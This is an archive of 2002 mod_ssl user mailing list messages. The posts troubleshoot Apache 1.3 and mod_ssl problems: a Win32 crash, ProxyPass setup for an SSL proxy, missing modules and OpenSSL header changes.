AAAAAC4AAAADAP0/5AQAAAMAGUAAAAAAAwAaQAAAAAADAB1AAAAAAAMAHkAAAAAAHwAwQAEAAAAO
AAAAQQBOAEcARQBMAE8AAAAAAB8AMUABAAAADgAAAEEATgBHAEUATABPAAAAAAAfADJAAQAAAB4A
AAByAGoAdwBAAHAAYwBzAC0AcwBkAC4AYwBvAG0AAAAAAB8AM0ABAAAAHgAAAHIAagB3AEAAcABj
AHMALQBzAGQALgBjAG8AbQAAAAAAHwA4QAEAAAAOAAAAQQBOAEcARQBMAE8AAAAAAB8AOUABAAAA
BAAAAC4AAAALACkAAAAAAAsAIwAAAAAAAwAGEJimKWADAAcQMggAAAMAEBAAAAAAAwAREAAAAAAe
AAgQAQAAAGUAAABBTExSSUdUSFRIQU5LwrRTVkVSWU1VQ0hJV0lMTFJFQURJVC0tLS0tTUVOU0FH
RU1PUklHSU5BTC0tLS0tREU6V09PRFJBU0tBLFJPQkVSVEpFTlZJQURBOlFVSTIzLzUvMjAwAAAA
AAIBfwABAAAAPgAAADxGQTk5MjcwMjJCMTRFMDQ1ODg4NkYyNjEyOUNCRjIwMzA3RUI2N0BBRVgw
MS5hbmNoaWV0YS5sb2NhbD4AAADMYg==

------_=_NextPart_001_01C2030F.3D46529A--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 24 14:07:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA05983; Fri, 24 May 2002 14:06:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from smtp.vasco.com id OAA05979; Fri, 24 May 2002 14:06:05 +0200 (MET DST)
Received: from 226.balt.vasco.com ([209.140.121.226]) by smtp.vasco.com with Microsoft SMTPSVC(5.0.2195.4905);
	 Fri, 24 May 2002 14:02:44 +0200
From: "Aryeh Katz" 
To: modssl-users@modssl.org
Received: from espanol.sytrix.com by 226.balt.vasco.com
          via smtpd (for [62.58.124.117]) with SMTP; 24 May 2002 12:06:04 UT
Date: Fri, 24 May 2002 08:07:09 -0400
MIME-Version: 1.0
Subject: Re: Apache + MOD_SSL Win32 crash
Message-ID: <3CEDF4AD.8869.28B545E2@localhost>
In-reply-to: <00b601c202f9$da99cce0$3c1f4d18@mikepc>
X-mailer: Pegasus Mail for Windows (v4.01)
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Content-description: Mail message body
X-OriginalArrivalTime: 24 May 2002 12:02:44.0190 (UTC) FILETIME=[E98907E0:01C2031A]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Aryeh Katz" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

One more thing. You might want to put your AddModule after your LoadModule, and see if it complains about the "Cannot load.." message below.
Aryeh
> Wow, thanks! That solved the problem.
> Wasn't expecting such an easy fix. :)
> 
> Mike
>     ----- Original Message ----- 
> From: Enrico Demarin 
> To: modssl-users@modssl.org 
> Sent: Friday, May 24, 2002 12:46 AM
> Subject: Re: Apache + MOD_SSL Win32 crash
> 
> This (again) sounds like the keep-alive bug : 
> 
> see
> 
> http://www.mail-archive.com/modssl-users@modssl.org/msg12969.html
> 
> - Enrico
>     ----- Original Message ----- 
> From: Mike Campbell 
> To: modssl-users@modssl.org 
> Sent: Thursday, May 23, 2002 10:48 PM
> Subject: Apache + MOD_SSL Win32 crash
> 
> Hello,
> I'm running Apache 1.3.24 with MOD_SSL 2.8.8 on a Windows 2000 
> server.
> 
> I've installed and configured according to the "Apache + SSL on Win32
> Howto"  and I've
> gotten a certificate from Thawte. I can and always have been able to
> make an (unsecure) http hit on the server. I can also make a secure
> https hit. However, if I reload the secure page a few times, sooner or
> later Apache crashes.
> 
> The error message that pops up says "Apache.exe has generated errors
> and will be closed by Windows. You will need to restart the program.
> An error log is being created." The Windows error log says it was an
> access violation and gives a stack dump, which I don't know how to
> read. The Apache error log and the SSL log are free of errors.
> 
> When starting Apache, the only complaint I was getting from the 
> config file was:
> "Cannot add module via name 'mod_ssl.c': not in list of loaded 
> modules"
> so I've commented that line out.
> 
> Does anyone have any suggestions?
> 
> 
> These are the relevant lines in httpd.conf:
> 
> ### (other AddModules) ###
> #AddModule mod_ssl.c
> ... 
> ### (other LoadModules) ###
> LoadModule ssl_module modules/mod_ssl.so
> ... 
> Listen 80
> Listen 443
> ... 
> SSLMutex sem
> SSLRandomSeed startup builtin
> SSLSessionCache none 
> SSLLog logs/SSL.log
> SSLLogLevel info 
> 
> DocumentRoot c:/...
> ServerName www.mydomain.com
> 
> ... 
> ### (many other VirtualHosts) ###
> 
> 
> SSLEngine On
> SSLCertificateFile conf/ssl/pubkey.cert
> SSLCertificateKeyFile conf/ssl/prvkey.key
> DocumentRoot c:/...
> ServerName www.mydomain.com
>  
> 
> -------------------------------------------------
> Mike Campbell Aktiv Software Corporation
> mcampbell@aktiv.com http://www.aktiv.com
> (250) 708-0027


---
Aryeh Katz
VASCO 			
www.vasco.com		

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 24 19:31:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA24853; Fri, 24 May 2002 19:30:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ssmail.ct.smartserv.com id TAA24828; Fri, 24 May 2002 19:30:00 +0200 (MET DST)
Received: by ssmail.ct.smartserv.com with Internet Mail Service (5.5.2653.19)
	id ; Fri, 24 May 2002 13:30:36 -0400
Message-ID: 
From: "Petryczka, George" 
To: "'modssl-users@modssl.org'" 
Subject: RE: ssl proxy
Date: Fri, 24 May 2002 13:30:35 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Petryczka, George" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

As a followup to below, what directives would be needed to accomplish this
"proxy" or "tunnel" or whatever i should call it?  Incidentally, if it
matters, the client here is not a browser - it's just a c-program that
writes raw http-headered request messages directly.  An illustrative example
would be great!


> > Can a httpd be set up as a "secure proxy"?  Ie.: forward requests
> > from a client  (a client that doesn't get involved with any ssl
> > stuff itself)  on to an HTTPS site?
> 
> Yes.  With Apache 1.3 / mod_ssl 2.8.x, you _might_ have to enable
> SSL_EXPERIMENTAL or something like that, I'm not sure.  But it can be
> done.
No special compile flags are necessary in 1.3.22+ and mod_ssl 2.8
Aryeh

---
Aryeh Katz
VASCO 			
www.vasco.com		

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon May 27 12:48:21 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id MAA19033; Mon, 27 May 2002 12:47:24 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from xfe3.d.ethz.ch id MAA19005; Mon, 27 May 2002 12:46:58 +0200 (MET DST)
Received: from xfe1.d.ethz.ch ([192.168.36.10]) by xfe3.d.ethz.ch with Microsoft SMTPSVC(5.0.2195.4905);
	 Mon, 27 May 2002 12:46:58 +0200
Received: from keller.com ([129.132.203.47]) by xfe1.d.ethz.ch with Microsoft SMTPSVC(5.0.2195.4905);
	 Mon, 27 May 2002 12:46:58 +0200
Message-ID: <3CF20EAD.4070704@keller.com>
Date: Mon, 27 May 2002 12:47:09 +0200
From: Matthias Keller 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.0rc2) Gecko/20020510
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Problems installing mod_ssl on Apache 1.3.19
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
X-OriginalArrivalTime: 27 May 2002 10:46:58.0106 (UTC) FILETIME=[D318E9A0:01C2056B]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Matthias Keller 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi

I have a SuSE 6.4 Server with Apache 1.3.19 (with PHP4 and mod_perl) 
which works correctly so far.

Yesterday I wanted to add mod_ssl to the server using yast.
I installed it with no errors, but when I tried to restart the server 
 (rcapache restart) i got this:

Syntax error on line 213 of /etc/httpd/httpd.conf:
Cannot load /usr/lib/apache/mod_sxnet.so into server: 
/usr/lib/apache/mod_sxnet.so: cannot open shared object file: No such 
file or directory

I had a look into /usr/lib/apache/ and there was NO mod_sxnet.so and 
there's neither one on the whole system (did a file search in MC)
I also had a look into the mod_ssl.rpm from the CD and there's also NO 
mod_sxnet.so in it!!

Then I downloaded the tarball for 1.3.19 (v 2.8.3) and got the 
sxnet-part out of it, compiled it with no errors and got a mod_sxnet.so.

I copied it into /usr/lib/apache/ with the only difference that 
 rcapache  states OK but the server isn't up and in the 
/var/log/httpd/error_log there's a line like:

[Mon May 27 12:35:21 2002] [crit] (98)Address already in use: make_sock: 
could not bind to port 80

I even tried restarting the whole server, no success....?!  Any idea?

btw: my httpd.conf around line 213:

LoadModule ssl_module         /usr/lib/apache/libssl.so
LoadModule sxnet_module       /usr/lib/apache/mod_sxnet.so


if you might need any other part, tell me...

Another thing:
Tried to use the mod_sxnet.so from mod_ssl 2.8.4 and got a slightly 
different; very strange error:
Syntax error on line 213 of /etc/httpd/httpd.conf:
Cannot load /usr/lib/apache/mod_sxnet.so into server: libssl.so.0.9.6: 
cannot open shared object file: No such file or directory

Thanks for any help!!!

Matt

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon May 27 15:11:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA24128; Mon, 27 May 2002 15:10:08 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from smtp.vasco.com id PAA24117; Mon, 27 May 2002 15:09:42 +0200 (MET DST)
Received: from 226.balt.vasco.com ([209.140.121.226]) by smtp.vasco.com with Microsoft SMTPSVC(5.0.2195.4905);
	 Mon, 27 May 2002 15:06:16 +0200
From: "Aryeh Katz" 
To: modssl-users@modssl.org
Received: from espanol.sytrix.com by 226.balt.vasco.com
          via smtpd (for [62.58.124.117]) with SMTP; 27 May 2002 13:09:39 UT
Date: Mon, 27 May 2002 09:11:04 -0400
MIME-Version: 1.0
Subject: RE: ssl proxy
Message-ID: <3CF1F828.4617.3862DD3C@localhost>
In-reply-to: 
X-mailer: Pegasus Mail for Windows (v4.01)
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Content-description: Mail message body
X-OriginalArrivalTime: 27 May 2002 13:06:17.0498 (UTC) FILETIME=[49AEE7A0:01C2057F]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Aryeh Katz" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

> As a followup to below, what directives would be needed to accomplish
> this "proxy" or "tunnel" or whatever i should call it?  Incidentally,
> if it matters, the client here is not a browser - it's just a
> c-program that writes raw http-headered request messages directly.  An
> illustrative example would be great!
In either a virtual host, or whole server:

ProxyPass / https://login.passport.com/
ProxyPassReverse / https://login.passport.com/
---
Aryeh Katz
VASCO 			
www.vasco.com		

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May 28 17:14:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA18491; Tue, 28 May 2002 17:13:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ssmail.ct.smartserv.com id RAA18478; Tue, 28 May 2002 17:12:37 +0200 (MET DST)
Received: by ssmail.ct.smartserv.com with Internet Mail Service (5.5.2653.19)
	id ; Tue, 28 May 2002 11:13:20 -0400
Message-ID: 
From: "Petryczka, George" 
To: "'modssl-users@modssl.org'" 
Subject: RE: ssl proxy
Date: Tue, 28 May 2002 11:13:17 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Petryczka, George" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Tried ProxyPass and ProxyPassReverse on my proxy box and my test fails
(even with just plain http) with 404.  To test I use MSIE against the proxy
host:
http://www.myprox.com:8080/cgi-bin/myscript

It does work when i point directly at the destination host:
http://www.mydest.com:8080/cgi-bin/myscript

so it does seem just the proxy is not set up right.
Maybe I need some special settings on the destination host too?  Oh and i
get no access.log entries on the destination box at all.


-----Original Message-----
From: Aryeh Katz [mailto:aryeh@vasco.com]
Sent: Monday, May 27, 2002 9:11 AM
To: modssl-users@modssl.org
Subject: RE: ssl proxy


> As a followup to below, what directives would be needed to accomplish
> this "proxy" or "tunnel" or whatever i should call it?  Incidentally,
> if it matters, the client here is not a browser - it's just a
> c-program that writes raw http-headered request messages directly.  An
> illustrative example would be great!
In either a virtual host, or whole server:

ProxyPass / https://login.passport.com/
ProxyPassReverse / https://login.passport.com/
---
Aryeh Katz
VASCO 			
www.vasco.com		

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May 28 17:16:16 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA18623; Tue, 28 May 2002 17:15:37 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from qeo02001.t-online.net id RAA18556; Tue, 28 May 2002 17:14:53 +0200 (MET DST)
Received: from qeo09161.de.t-online.corp (qeo09161 [192.168.248.161])
	by qeo02001.t-online.net (8.9.3/8.9.3/Debian 8.9.3-21) with ESMTP id RAA20355;
	Tue, 28 May 2002 17:14:41 +0200
X-Authentication-Warning: qeo02001.t-online.net: Host qeo09161 [192.168.248.161] claimed to be qeo09161.de.t-online.corp
Received: from qeo00200.de.t-online.corp ([192.168.195.200]) by qeo09161.de.t-online.corp with Microsoft SMTPSVC(5.0.2195.2966);
	 Tue, 28 May 2002 17:11:54 +0200
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Subject: Bug Report mod_ssl 2.8.8 for Apache 1.3.24 with openssl-0.9.6.d
Date: Tue, 28 May 2002 17:11:53 +0200
Message-ID: <60F1F87A64834D45A1EBAE9618305FB86ECC76@qeo00200>
Thread-Topic: Bug Report mod_ssl 2.8.8 for Apache 1.3.24 with openssl-0.9.6.d
Thread-Index: AcIGWkmxCWorkHITEdaTWAACsyarwQ==
From: "Courtin Bert" 
To: , 
X-OriginalArrivalTime: 28 May 2002 15:11:54.0656 (UTC) FILETIME=[0097B200:01C2065A]
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id RAB18580
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Courtin Bert" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi there,

using openssl-0.9.6.d with Apache/1.3.24 (Unix) mod_perl/1.26 PHP/4.2.0 mod_ssl/2.8.8 seems to lead to the following error on solaris 2.8:

Apaches error-log:
[error] mod_ssl: Init: Failed to generate temporary 512 bit RSA private key

which prevents apache from starting.

Openssl-0.9.6.c works without any problems (with the same compile options etc.)

Kind regards,
Bert Courtin
	
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May 28 17:20:26 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA18834; Tue, 28 May 2002 17:18:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from bull1.bourse.ch id RAA18828; Tue, 28 May 2002 17:18:06 +0200 (MET DST)
Received: (from nobody@localhost)
	by bull1.bourse.ch (8.8.8+Sun/8.8.8) id RAA20457
	for ; Tue, 28 May 2002 17:17:57 +0200 (MET DST)
X-Authentication-Warning: bull1.bourse.ch: nobody set sender to  using -f
Received: from trifid2(172.20.196.132) by bull1 via smap (V2.1)
	id xma020455; Tue, 28 May 02 17:17:47 +0200
Received: from regulus.bourse.ch (regulus [172.20.196.148])
	by trifid2.bourse.ch (8.8.8+Sun/8.8.8) with ESMTP id RAA24395
	for ; Tue, 28 May 2002 17:17:47 +0200 (MET DST)
Received: from bourse.ch (localhost [127.0.0.1])
	by regulus.bourse.ch (8.9.3+Sun/8.9.3) with ESMTP id RAA06644
	for ; Tue, 28 May 2002 17:17:46 +0200 (MEST)
Message-ID: <3CF39F99.C38EE4B3@bourse.ch>
Date: Tue, 28 May 2002 17:17:45 +0200
From: Owen Boyle 
X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 sun4u)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: ssl proxy
References: 
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Owen Boyle 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

"Petryczka, George" wrote:
> 
> Tried ProxyPass and ProxyPassReverse on my proxy box and my test fails
> (even with just plain http) with 404.  To test I use MSIE against the proxy
> host:
> http://www.myprox.com:8080/cgi-bin/myscript
> 
> It does work when i point directly at the destination host:
> http://www.mydest.com:8080/cgi-bin/myscript

What do you want to type in the browser?
What do you want it to produce?
What do your proxy directives look like?

rgds,

Owen Boyle.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May 28 17:24:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA19204; Tue, 28 May 2002 17:23:15 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from smtp.vasco.com id RAA19182; Tue, 28 May 2002 17:22:28 +0200 (MET DST)
Received: from 226.balt.vasco.com ([209.140.121.226]) by smtp.vasco.com with Microsoft SMTPSVC(5.0.2195.4905);
	 Tue, 28 May 2002 17:19:02 +0200
From: "Aryeh Katz" 
To: modssl-users@modssl.org
Received: from espanol.sytrix.com by 226.balt.vasco.com
          via smtpd (for [62.58.124.117]) with SMTP; 28 May 2002 15:22:26 UT
Date: Tue, 28 May 2002 11:23:58 -0400
MIME-Version: 1.0
Subject: RE: ssl proxy
Message-ID: <3CF368CE.26989.3E02E659@localhost>
In-reply-to: 
X-mailer: Pegasus Mail for Windows (v4.01)
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Content-description: Mail message body
X-OriginalArrivalTime: 28 May 2002 15:19:02.0665 (UTC) FILETIME=[FFB4AF90:01C2065A]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Aryeh Katz" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

> Tried ProxyPass and ProxyPassReverse on my proxy box and my test fails
> (even with just plain http) with 404.  To test I use MSIE against the
> proxy host: http://www.myprox.com:8080/cgi-bin/myscript
> 
> It does work when i point directly at the destination host:
> http://www.mydest.com:8080/cgi-bin/myscript
I thought you said that your destination host was ssl. shouldn't that be 
httpS://www.mydest.com?
Anyway, make sure mod_ssl is loaded, and enabled (-DSSL) in your proxy, 
then it should be able to connect via ssl.
---
Aryeh Katz
VASCO 			
www.vasco.com		

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May 28 17:50:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA20695; Tue, 28 May 2002 17:49:43 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ssmail.ct.smartserv.com id RAA20646; Tue, 28 May 2002 17:48:57 +0200 (MET DST)
Received: by ssmail.ct.smartserv.com with Internet Mail Service (5.5.2653.19)
	id ; Tue, 28 May 2002 11:49:51 -0400
Message-ID: 
From: "Petryczka, George" 
To: "'modssl-users@modssl.org'" 
Subject: RE: ssl proxy
Date: Tue, 28 May 2002 11:49:41 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Petryczka, George" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Owen,
The browser is just for test to verify that proxy is working.  My ultimate
goal does not involve browsers at all - just an app pumping http messages
into a proxy that converts to SSL and forwards to an https client.

Anyway, for the test, the only settings i have changed from the default conf
file  (aside from domain names and emails) is :
       on the target:   No change
       on the proxy:    ProxyPass and ProxyPassReverse
as was suggested to me by Aryeh.  Also on the proxy:  the Ifmodule
Mod_proxy.c clause is uncommented, Proxy Reqeusts On is set, and httpd -l
shows proxy.c module is compiled in.

(And i'm not even trying this with HTTPS/SSL yet, though that is ultimately
my goal - i just want to keep it as simple as i can for first test.)

What i type in the browser is the url to myscript  (see original note
below).

What i want displayed is simply the output of myscript  (which i DO get
successfully if i point directly at the destination, again, as i note below.

-george

-----Original Message-----
From: Owen Boyle [mailto:obo@bourse.ch]
Sent: Tuesday, May 28, 2002 11:18 AM
To: modssl-users@modssl.org
Subject: Re: ssl proxy


"Petryczka, George" wrote:
> 
> Tried ProxyPass and ProxyPassReverse on my proxy box and my test fails
> (even with just plain http) with 404.  To test I use MSIE against the
proxy
> host:
> http://www.myprox.com:8080/cgi-bin/myscript
> 
> It does work when i point directly at the destination host:
> http://www.mydest.com:8080/cgi-bin/myscript

What do you want to type in the browser?
What do you want it to produce?
What do your proxy directives look like?

rgds,

Owen Boyle.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May 28 18:11:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA23712; Tue, 28 May 2002 18:10:30 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from nixpbe.pdb.sbs.de id SAA22916; Tue, 28 May 2002 18:08:19 +0200 (MET DST)
Received: from trulli.pdb.fsc.net (ThisAddressDoesNotExist [172.25.96.20] (may be forged))
	by nixpbe.pdb.sbs.de (8.11.2/8.11.2) with ESMTP id g4SG8CE23273;
	Tue, 28 May 2002 18:08:12 +0200
Received: from deejai2.mch.fsc.net (deejai2.mch.fsc.net [172.25.124.236])
	by trulli.pdb.fsc.net (8.9.3/8.9.3) with ESMTP id SAA02337;
	Tue, 28 May 2002 18:08:10 +0200
Received: (from root@localhost)
	by deejai2.mch.fsc.net (8.12.3/8.12.2) id g4SG8C9w067050;
	Tue, 28 May 2002 18:08:12 +0200 (CEST)
	(envelope-from martin@deejai2.mch.fsc.net)
Received: from deejai2.mch.fsc.net (localhost6 [IPv6:::1])
	by deejai2.mch.fsc.net (8.12.3/8.12.3) with ESMTP id g4SG88L7067043;
	Tue, 28 May 2002 18:08:08 +0200 (CEST)
	(envelope-from martin@deejai2.mch.fsc.net)
Received: (from martin@localhost)
	by deejai2.mch.fsc.net (8.12.3/8.12.3/Submit) id g4SG88tW067042;
	Tue, 28 May 2002 18:08:08 +0200 (CEST)
Date: Tue, 28 May 2002 18:08:08 +0200
From: Martin Kraemer 
To: modssl-users@modssl.org, openssl-dev@openssl.org
Subject: NID_uniqueIdentifier got (partially) lost?
Message-ID: <20020528180808.A66725@deejai2.mch.fsc.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5.1i
X-Operating-System: FreeBSD 4.6-RC FreeBSD 4.6-RC
X-Organization: Fujitsu Siemens Computers (Muenchen, Germany)
X-Disclaimer: THE COMMENTS CONTAINED IN THIS MESSAGE REFLECT THE VIEWS OF THE  WRITER AND ARE NOT NECESSARILY THE VIEWS OF FUJITSU-SIEMENS COMPUTERS
X-No-Junk-Mail: I do not want to get *any* junk mail.
X-Virus-Scanned: by AMaViS perl-11
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Martin Kraemer 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

When trying to compile apache+mod_ssl against a recent snapshot of
openssl-0.9.8-dev (?), I get compile errors because the #define for
  NID_uniqueIdentifier
is no longer present. It used to be both in objects.h and in obj_mac.h
(and is referenced in ssl_engine_vars.c): 
 cscope:
 0 ssl_engine_vars.c   410 { "UID", NID_uniqueIdentifier },
 1 objects.h           557 #define NID_uniqueIdentifier 102
 2 obj_mac.h          1550 #define NID_uniqueIdentifier 102

Now the funny thing is that the variable is still present in an up-to-date
copy of objects.h, but it has vanished from obj_mac.h (but USE_OBJ_MAC
is set so it is only #included freom the latter).

It appears that a renaming has happened, as the string "UID" is still
present in both include files, albeit with a different definition:
---obj_mac.h:---
#define SN_userId               "UID"
#define LN_userId               "userId"
#define NID_userId              458
#define OBJ_userId              OBJ_pilotAttributeType,1L
---objects.h:---
#define SN_uniqueIdentifier             "UID"
#define LN_uniqueIdentifier             "uniqueIdentifier"
#define NID_uniqueIdentifier            102
#define OBJ_uniqueIdentifier            OBJ_X509,45L

And it is the "UID" which mod_ssl tries to decode:
  static const struct {
    char *name;
    int   nid;
  } ssl_var_lookup_ssl_cert_dn_rec[] = {
  ...
    { "UID",   NID_uniqueIdentifier       },
  ...
    { NULL,    0                          }
  };


So, which file is correct, or: why was obj_mac.h fixed, but objects.h
wasn't?

Puzzled,

   Martin
-- 
         |     Fujitsu Siemens
Fon: +49-89-636-46021, FAX: +49-89-636-47655 | 81730  Munich,  Germany
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May 28 18:26:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA24514; Tue, 28 May 2002 18:25:19 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from smtp.vasco.com id SAA24490; Tue, 28 May 2002 18:24:32 +0200 (MET DST)
Received: from 226.balt.vasco.com ([209.140.121.226]) by smtp.vasco.com with Microsoft SMTPSVC(5.0.2195.4905);
	 Tue, 28 May 2002 18:21:07 +0200
From: "Aryeh Katz" 
To: modssl-users@modssl.org
Received: from espanol.sytrix.com by 226.balt.vasco.com
          via smtpd (for [62.58.124.117]) with SMTP; 28 May 2002 16:24:31 UT
Date: Tue, 28 May 2002 12:26:03 -0400
MIME-Version: 1.0
Subject: RE: ssl proxy
Message-ID: <3CF3775B.27703.3E3BBD78@localhost>
In-reply-to: 
X-mailer: Pegasus Mail for Windows (v4.01)
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Content-description: Mail message body
X-OriginalArrivalTime: 28 May 2002 16:21:07.0423 (UTC) FILETIME=[ABD5A6F0:01C20663]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Aryeh Katz" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

> What i type in the browser is the url to myscript  (see original note
> below).
> 
> What i want displayed is simply the output of myscript  (which i DO
> get successfully if i point directly at the destination, again, as i
> note below.
> 
> -george
If you show us your exact proxy directive, it would help. You are probably missing the port.
Thus, your ProxyPass (and ProxyPassReverse) should say:
ProxyPass / http://my.dest.com:8080/
Aryeh
---
Aryeh Katz
VASCO 			
www.vasco.com		

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
